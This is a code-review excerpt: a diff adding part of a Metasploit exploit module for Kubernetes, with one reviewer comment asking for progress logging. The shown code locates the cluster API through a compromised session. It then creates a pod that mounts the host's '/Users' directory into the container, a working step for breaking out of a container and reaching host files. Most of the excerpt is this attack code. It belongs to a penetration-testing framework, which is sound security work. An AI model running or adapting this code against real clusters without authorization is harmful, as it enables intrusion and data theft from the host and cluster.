modules/exploits/multi/kubernetes/exec.rb

```diff
@@ -0,0 +1,321 @@
+      fail_with(Failure::NotFound, 'The namespace was not found, manually set the NAMESPACE option') if ns.blank?
+
+      print_good("Namespace: #{ns}")
+      @namespace = ns
+    end
+
+    service_host = service_port = nil
+    if rhost.blank?
+      service_host = get_env('KUBERNETES_SERVICE_HOST')
+      fail_with(Failure::NotFound, 'The KUBERNETES_SERVICE_HOST environment variable was not found, manually set the RHOSTS option') if service_host.blank?
+
+      @rhost = service_host
+    end
+
+    if rport.blank?
+      service_port = get_env('KUBERNETES_SERVICE_PORT')
+      fail_with(Failure::NotFound, 'The KUBERNETES_SERVICE_PORT environment variable was not found, manually set the RPORT option') if service_port.blank?
+
+      @rport = service_port.to_i
+    end
+
+    if service_host || service_port
+      service = "#{Rex::Socket.is_ipv6?(service_host) ? '[' + service_host + ']' : service_host}:#{service_port}"
+      print_good("Kubernetes service host: #{service}")
+    end
+  end
+
+  def connect_ws(opts = {}, *args)
+    opts['comm'] = session
+    opts['vhost'] = rhost
+    super
+  end
+
+  def send_request_raw(opts = {}, *args)
+    opts['comm'] = session
+    opts['vhost'] = rhost
+    super
+  end
+
+  def create_pod
+    random_identifiers = Rex::RandomIdentifier::Generator.new({
+      first_char_set: Rex::Text::LowerAlpha,
+      char_set: Rex::Text::LowerAlpha + Rex::Text::Numerals
+    })
+
+    image_name = @kubernetes_client.list_pods(namespace).dig(:items, 0, :spec, :containers, 0, :image)
+    print_status("Using image: #{image_name}")
+
+    new_pod_definition = {
+      apiVersion: 'v1',
+      kind: 'Pod',
+      metadata: {
+        name: random_identifiers[:pod_name],
+        labels: {}
+      },
+      spec: {
+        containers: [
+          {
+            name: random_identifiers[:container_name],
+            image: image_name,
+            command: %w[/bin/tail -f /dev/null],
+            volumeMounts: [
+              {
+                mountPath: '/host_mnt',
+                name: random_identifiers[:volume_name]
+              }
+            ]
+          }
+        ],
+        volumes: [
+          {
+            name: random_identifiers[:volume_name],
+            hostPath: {
+              path: '/Users'
+            }
+          }
+        ]
+      }
+    }
+    result = @kubernetes_client.create_pod(new_pod_definition, namespace)
+    report_note(
+      type: 'kubernetes.pod',
+      host: rhost,
+      port: rport,
+      data: {
+        pod: Hash[%i[name namespace uid creationTimestamp].map { |field| [field, result.dig(:metadata, field)] }]
+      },
+      update: :unique_data
+    )
+
+    @pod_name = random_identifiers[:pod_name]
+    print_good("Pod created: #{pod_name}")
+
+    phase = nil
+    print_status('Waiting for the pod to be ready...')
+    10.times do
+      sleep 3
+      phase = @kubernetes_client.get_pod(pod_name, namespace)&.dig(:status, :phase)&.downcase
```

Comment:
I wonder if it would be useful to log the value of this at least once/occasionally to let the user know something's happening 🤔